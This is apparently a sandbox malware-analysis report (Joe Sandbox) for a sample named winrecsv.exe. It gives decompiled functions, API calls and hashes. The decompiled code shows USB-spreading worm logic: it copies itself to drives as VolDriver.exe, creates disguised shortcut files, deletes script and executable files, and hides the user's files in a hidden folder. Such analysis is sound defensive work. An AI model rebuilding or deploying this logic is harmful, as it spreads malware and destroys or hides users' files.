                                                                                  				L8:
                                                                                  				return _v261;
                                                                                  			}

                                                                                  APIs
                                                                                  • gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                  • gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: gethostbynamegethostname
                                                                                  • String ID:
                                                                                  • API String ID: 3961807697-0
                                                                                  • Opcode ID: 808cf5df3e9fd6a65e29826da0babf303ea90eaf0688b2a0cc418730ea916311
                                                                                  • Instruction ID: f0f33a221f668f8c0fcc91920a55244d325127aac38b05b4e471762a159245cf
                                                                                  • Opcode Fuzzy Hash: 808cf5df3e9fd6a65e29826da0babf303ea90eaf0688b2a0cc418730ea916311
                                                                                  • Instruction Fuzzy Hash: 52113C349081588BCB24CF14D888BE9B771BB65324F1482EAD98967381CBF9AEC1DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: gethostbynameinet_addr
                                                                                  • String ID:
                                                                                  • API String ID: 1594361348-0
                                                                                  • Opcode ID: ae6e9143cc9fd0412d08de2142f11acaaa5e5d8f8e0ab0b734499e2ded0367d9
                                                                                  • Instruction ID: e12a1822e7991c67d301e70435f839a18b0547e84016115f2855d72db6d5141d
                                                                                  • Opcode Fuzzy Hash: ae6e9143cc9fd0412d08de2142f11acaaa5e5d8f8e0ab0b734499e2ded0367d9
                                                                                  • Instruction Fuzzy Hash: 48F0AC79D01208EFCB14EFA5D54899DFBB4EB49311F20C2AAE905673A0D735DE80DB84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • shutdown.WS2_32(0040992D,00000002), ref: 00409949
                                                                                  • closesocket.WS2_32(0040992D), ref: 00409953
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: closesocketshutdown
                                                                                  • String ID:
                                                                                  • API String ID: 572888783-0
                                                                                  • Opcode ID: c790331b5cd7c8b9c3a3a0dd8161d67bf409c5c834cb86956d8decf4f63a3b2a
                                                                                  • Instruction ID: 861187f23b08c56acf9f6e17a30e7296ca2e2ef9db7bec87e2e63002d69b9e52
                                                                                  • Opcode Fuzzy Hash: c790331b5cd7c8b9c3a3a0dd8161d67bf409c5c834cb86956d8decf4f63a3b2a
                                                                                  • Instruction Fuzzy Hash: 41C04C79180308FBDF549FA5EC4DDD93B6CFB48751F008555FA098B251CAF6E9808B94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 87%
                                                                                  			E00409F60(void* __ecx) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _t7;
                                                                                  				signed int _t8;
                                                                                  
                                                                                  				_t9 = __ecx;
                                                                                  				_push(__ecx);
                                                                                  				_v8 = 0;
                                                                                  				EnterCriticalSection(0x414e4c);
                                                                                  				if( *0x414e84 != 0) {
                                                                                  					_t7 =  *0x414e84; // 0x200
                                                                                  					_t8 = E0040AB90(_t9, _t7); // executed
                                                                                  					_v8 =  *((intOrPtr*)(0x414e88 + _t8 * 4));
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x414e4c);
                                                                                  				return _v8;
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00414E4C), ref: 00409F70
                                                                                  • LeaveCriticalSection.KERNEL32(00414E4C), ref: 00409F9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 01d01ecd818faf5180c661ddcbcbb2319f5acf6ff06af3063e4ed8a914aad338
                                                                                  • Instruction ID: 25df91cf97f831dea6273b9daeb39aeabfa88b51072c83d00e806302a444a612
                                                                                  • Opcode Fuzzy Hash: 01d01ecd818faf5180c661ddcbcbb2319f5acf6ff06af3063e4ed8a914aad338
                                                                                  • Instruction Fuzzy Hash: 5EE01AB5941308ABCB04DB94ED0AB9977B8F744315F148079F80493391E7B9AE50CA59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00409A90() {
                                                                                  				void* _t1;
                                                                                  				void* _t2;
                                                                                  
                                                                                  				EnterCriticalSection(0x414e4c); // executed
                                                                                  				_t2 = E004099A0(_t1); // executed
                                                                                  				LeaveCriticalSection(0x414e4c);
                                                                                  				return _t2;
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00414E4C,?,0040A157), ref: 00409A98
                                                                                  • LeaveCriticalSection.KERNEL32(00414E4C,?,0040A157), ref: 00409AA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: e18a02edf5445c449eccb006dd19a446ab1a3f82073fd4b8f85ff8a6d52f202e
                                                                                  • Instruction ID: 3b0d21b6a5788eaa33e0a5e0c64b79d2b817c3cb29f227cef7228f4eaa42b4a3
                                                                                  • Opcode Fuzzy Hash: e18a02edf5445c449eccb006dd19a446ab1a3f82073fd4b8f85ff8a6d52f202e
                                                                                  • Instruction Fuzzy Hash: ACB09B3514030C77C10037E1EC0F5C47758E5457153554036F405D31538BFF14D1455E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040BC50(void* __ecx) {
                                                                                  				LONG* _v8;
                                                                                  				LONG* _t4;
                                                                                  				signed char _t5;
                                                                                  				void* _t10;
                                                                                  
                                                                                  				_t8 = __ecx;
                                                                                  				_push(__ecx); // executed
                                                                                  				while(1) {
                                                                                  					_t4 = E00409F60(_t8); // executed
                                                                                  					_v8 = _t4;
                                                                                  					if(_v8 != 0) {
                                                                                  						E0040BAB0(_v8, 0); // executed
                                                                                  						_t10 = _t10 + 8;
                                                                                  					}
                                                                                  					_t8 =  *0x414e64; // 0x52c
                                                                                  					_t5 = WaitForSingleObject(_t8, 0x1388);
                                                                                  					if(_t5 != 0x102) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t5 = E0040A190();
                                                                                  					if((_t5 & 0x000000ff) == 0) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				return _t5;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 00409F60: EnterCriticalSection.KERNEL32(00414E4C), ref: 00409F70
                                                                                    • Part of subcall function 00409F60: LeaveCriticalSection.KERNEL32(00414E4C), ref: 00409F9C
                                                                                  • WaitForSingleObject.KERNEL32(0000052C,00001388), ref: 0040BC7C
                                                                                    • Part of subcall function 0040BAB0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040BABC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 3309573332-0
                                                                                  • Opcode ID: 9f999fc85b079daa0ea8d94160f70d4837a7598394ec2e0625308a16e62c20a1
                                                                                  • Instruction ID: 45619751f27a18747ded538dc82d1d8d9d30f0da801dbdba264301761bfcf2d9
                                                                                  • Opcode Fuzzy Hash: 9f999fc85b079daa0ea8d94160f70d4837a7598394ec2e0625308a16e62c20a1
                                                                                  • Instruction Fuzzy Hash: 57E09270904308A6E714E7A19C0AB5F7269D754305F14847EF9007A2C2DE799E80C7DC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction ID: 32df2bfe7de06f0c235163c896e6267a06dc4b8e9f39d59c6c8874ca765da36c
                                                                                  • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction Fuzzy Hash: 0FE0127490020CFFDF00DF90C889BDEBBB9EB44315F1081A9E90467284D7B55A84CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404860(signed int _a4, signed int _a8, WCHAR* _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v12;
                                                                                  				short _v14;
                                                                                  				short _v16;
                                                                                  				intOrPtr _t19;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if((0x00000001 << _a8 & _a4) != 0) {
                                                                                  					_v16 = _a8 + 0x41;
                                                                                  					_v14 = 0x3a;
                                                                                  					_v12 = 0;
                                                                                  					_t19 = E004047E0( &_v16); // executed
                                                                                  					_v8 = _t19;
                                                                                  					if(_v8 != 0) {
                                                                                  						lstrcpyW(_a12,  &_v16);
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}

                                                                                  0x00404866
                                                                                  0x0040487a
                                                                                  0x00404883
                                                                                  0x0040488c
                                                                                  0x00404892
                                                                                  0x0040489a
                                                                                  0x004048a2
                                                                                  0x004048a9
                                                                                  0x004048b3
                                                                                  0x004048b3
                                                                                  0x004048a9
                                                                                  0x004048bf

                                                                                  APIs
                                                                                    • Part of subcall function 004047E0: GetDriveTypeW.KERNELBASE(0040489F), ref: 004047ED
                                                                                  • lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DriveTypelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3664088370-0
                                                                                  • Opcode ID: aed3bbd9218a36ae3e4d8c15ba3d6df83cbfa9a0731111e7d8ec09f3f9f4cc49
                                                                                  • Instruction ID: bb802be56eedc3909057cb4b444c6c3d96b1217a29676591d358a89cf413bc85
                                                                                  • Opcode Fuzzy Hash: aed3bbd9218a36ae3e4d8c15ba3d6df83cbfa9a0731111e7d8ec09f3f9f4cc49
                                                                                  • Instruction Fuzzy Hash: 1CF01DB5D00248FBDB00DFA4D455BDEB7B4EF44304F04C5A9E915AB341E679AB18CB89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404BD0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				short _v1564;
                                                                                  				short _v2084;
                                                                                  				intOrPtr _v2088;
                                                                                  				short _v2612;
                                                                                  				short _v3132;
                                                                                  				char _v3133;
                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                  				short _v4252;
                                                                                  				void* _v4256;
                                                                                  				short _v4780;
                                                                                  				intOrPtr _v4784;
                                                                                  				WCHAR* _v4788;
                                                                                  				WCHAR* _v4792;
                                                                                  				WCHAR* _v4796;
                                                                                  				WCHAR* _v4800;
                                                                                  				WCHAR* _v4804;
                                                                                  				intOrPtr _v4808;
                                                                                  				WCHAR* _v4812;
                                                                                  				WCHAR* _v4816;
                                                                                  				WCHAR* _v4820;
                                                                                  				WCHAR* _v4824;
                                                                                  				WCHAR* _v4828;
                                                                                  				WCHAR* _v4832;
                                                                                  				WCHAR* _v4836;
                                                                                  				WCHAR* _v4840;
                                                                                  				WCHAR* _v4844;
                                                                                  				WCHAR* _v4848;
                                                                                  				WCHAR* _v4852;
                                                                                  				WCHAR* _v4856;
                                                                                  				WCHAR* _v4860;
                                                                                  				signed char _v4861;
                                                                                  				signed char _v4862;
                                                                                  				signed int _v4868;
                                                                                  				signed int _v4872;
                                                                                  				intOrPtr _t167;
                                                                                  				intOrPtr _t195;
                                                                                  				void* _t218;
                                                                                  				void* _t219;
                                                                                  				void* _t224;
                                                                                  
                                                                                  				L0040F1AA();
                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_v2088 = 0x4140cc;
                                                                                  				_v3133 = 0;
                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                  				_t224 = _t219 + 0x48;
                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                  					_t167 = E0040D530( &_v4780);
                                                                                  					_t224 = _t224 + 4;
                                                                                  					_v4784 = _t167;
                                                                                  					_t195 =  *0x414410; // 0x12e00
                                                                                  					if(_t195 != _v4784) {
                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                  						DeleteFileW( &_v4780);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                  					}
                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(?str?,  &_v4780, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 8);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					} else {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 9);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					}
                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                  				}
                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                  					L45:
                                                                                  					return _v3133;
                                                                                  				} else {
                                                                                  					_v4860 = L"*.lnk";
                                                                                  					_v4856 = L"*.vbs";
                                                                                  					_v4852 = L"*.js";
                                                                                  					_v4848 = L"*.scr";
                                                                                  					_v4844 = L"*.com";
                                                                                  					_v4840 = L"*.jse";
                                                                                  					_v4836 = L"*.cmd";
                                                                                  					_v4832 = L"*.pif";
                                                                                  					_v4828 = L"*.jar";
                                                                                  					_v4824 = L"*.dll";
                                                                                  					_v4820 = L"*.vbe";
                                                                                  					_v4816 = L"*.bat";
                                                                                  					_v4812 = L"*.inf";
                                                                                  					_v4808 = _v2088;
                                                                                  					_v4804 =  &_v1564;
                                                                                  					_v4800 = L"Thumbs.db";
                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                  					_v4792 = L"desktop.ini";
                                                                                  					_v4788 = L"System Volume Information";
                                                                                  					do {
                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                  							_v4862 = 0;
                                                                                  							_v4868 = 0;
                                                                                  							while(_v4868 < 6) {
                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                  									_v4862 = 1;
                                                                                  									break;
                                                                                  								}
                                                                                  								_v4868 = _v4868 + 1;
                                                                                  							}
                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                  								_v4861 = 0;
                                                                                  								_v4872 = 0;
                                                                                  								while(_v4872 < 0xd) {
                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x10;
                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                  										DeleteFileW( &_v2084);
                                                                                  										_v4861 = 1;
                                                                                  										break;
                                                                                  									}
                                                                                  									_v4872 = _v4872 + 1;
                                                                                  								}
                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x24;
                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                  										} else {
                                                                                  											E00404A90( &_v3132,  &_v524);
                                                                                  											_t224 = _t224 + 8;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L43;
                                                                                  							}
                                                                                  						}
                                                                                  						L43:
                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                  					FindClose(_v4256);
                                                                                  					goto L45;
                                                                                  				}
                                                                                  			}


                                                                                  0x00404bd8
                                                                                  0x00404be5
                                                                                  0x00000000
                                                                                  0x00404be7
                                                                                  0x00404bee
                                                                                  0x00404bf8
                                                                                  0x00404c0f
                                                                                  0x00404c2f
                                                                                  0x00404c4f
                                                                                  0x00404c6f
                                                                                  0x00404c88
                                                                                  0x00404c8e
                                                                                  0x00404ca0
                                                                                  0x00404ca9
                                                                                  0x00404cae
                                                                                  0x00404cb1
                                                                                  0x00404cb7
                                                                                  0x00404cc3
                                                                                  0x00404cd1
                                                                                  0x00404cde
                                                                                  0x00404cde
                                                                                  0x00404cc3
                                                                                  0x00404cf3
                                                                                  0x00404d04
                                                                                  0x00404d22
                                                                                  0x00404d22
                                                                                  0x00404d37
                                                                                  0x00404d5a
                                                                                  0x00404d5a
                                                                                  0x00404d37
                                                                                  0x00404d6f
                                                                                  0x00404d77
                                                                                  0x00404d9f
                                                                                  0x00404da4
                                                                                  0x00404d79
                                                                                  0x00404d87
                                                                                  0x00404d8c
                                                                                  0x00404d8c
                                                                                  0x00404db0
                                                                                  0x00404db0
                                                                                  Address column (decompiler listing): 0x00404dca, 0x00404dd7, 0x0040509f, 0x00000000, 0x00404ddd, 0x00404ddd, 0x00404de7, 0x00404df1, 0x00404dfb, 0x00404e05,
                                                                                  0x00404e0f, 0x00404e19, 0x00404e23, 0x00404e2d, 0x00404e37, 0x00404e41, 0x00404e4b, 0x00404e55, 0x00404e65, 0x00404e71,
                                                                                  0x00404e77, 0x00404e81, 0x00404e8b, 0x00404e95, 0x00404e9f, 0x00404eb3, 0x00404ed0, 0x00404ed7, 0x00404ef2, 0x00404f18,
                                                                                  0x00404f1c, 0x00000000, 0x00404f1c, 0x00404eec, 0x00404eec, 0x00404f30, 0x00404f37, 0x00404f3e, 0x00404f59, 0x00404f7f,
                                                                                  0x00404f9a, 0x00404fa0, 0x00404faf, 0x00404fbc, 0x00404fc2, 0x00000000, 0x00404fc2, 0x00404f53, 0x00404f53, 0x00404fd9,
                                                                                  0x00404fef, 0x0040500d, 0x00405034, 0x0040503a, 0x00405046, 0x00405070, 0x00405048, 0x00405056, 0x0040505b, 0x0040505b,
                                                                                  0x00405046, 0x00404fef, 0x00000000, 0x00404fd9, 0x00404f32, 0x00405076, 0x0040508a, 0x00405099, 0x00000000, 0x00405099

                                                                                  APIs
                                                                                  • _chkstk.NTDLL(?,00405220,?,?,?), ref: 00404BD8
                                                                                  • wsprintfW.USER32 ref: 00404C0F
                                                                                  • wsprintfW.USER32 ref: 00404C2F
                                                                                  • wsprintfW.USER32 ref: 00404C4F
                                                                                  • wsprintfW.USER32 ref: 00404C6F
                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404C98
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404CD1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404CDE
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CEB
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CFC
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404D0F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D22
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404D2F
                                                                                  • CopyFileW.KERNEL32(C:\Windows\winrecsv.exe,?,00000000), ref: 00404D47
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$C:\Windows\winrecsv.exe$shell32.dll$shell32.dll
                                                                                  • API String ID: 3833403615-3739611160
                                                                                  • Opcode ID: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction ID: 56dfbe622999f3f4d946997a069b2a92ca57c1f224be27ae97978ead2f5811f9
                                                                                  • Opcode Fuzzy Hash: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction Fuzzy Hash: BBD170B4900219AFCB20DF60DC44BEA77B8BF44304F0485E9F609A6290D7B99BD4CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404A90(WCHAR* _a4, char _a8) {
                                                                                  				short _v524;
                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                  				void* _v1120;
                                                                                  				short _v1644;
                                                                                  				short _v2164;
                                                                                  				void* _t29;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t1 =  &_a8; // 0x40505b
                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                  				_t61 = _t60 + 0xc;
                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                  				_v1120 = _t29;
                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                  					return _t29;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                  						_t14 =  &_a8; // 0x40505b
                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                  						_t61 = _t61 + 0x20;
                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                  						} else {
                                                                                  							E00404A90( &_v1644,  &_v2164);
                                                                                  							_t61 = _t61 + 8;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                  				FindClose(_v1120);
                                                                                  				return RemoveDirectoryW(_a4);
                                                                                  			}

                                                                                  Address column (decompiler listing): 0x00404a9b, 0x00404a9f, 0x00404ab5, 0x00404abb, 0x00404acc, 0x00404ad2, 0x00404adf, 0x00404bc2, 0x00000000, 0x00000000,
                                                                                  0x00000000, 0x00404ae5, 0x00404ae5, 0x00404af9, 0x00404b2a, 0x00404b3a, 0x00404b4a, 0x00404b50, 0x00404b5c, 0x00404b86,
                                                                                  0x00404b5e, 0x00404b6c, 0x00404b71, 0x00404b71, 0x00404b5c, 0x00404ba0, 0x00404baf, 0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32([P@,00000000), ref: 00404A9F
                                                                                  • wsprintfW.USER32 ref: 00404AB5
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404ACC
                                                                                  • lstrcmpW.KERNEL32(?,00411594), ref: 00404AF1
                                                                                  • lstrcmpW.KERNEL32(?,00411598), ref: 00404B07
                                                                                  • wsprintfW.USER32 ref: 00404B2A
                                                                                  • wsprintfW.USER32 ref: 00404B4A
                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404B86
                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404B9A
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404BAF
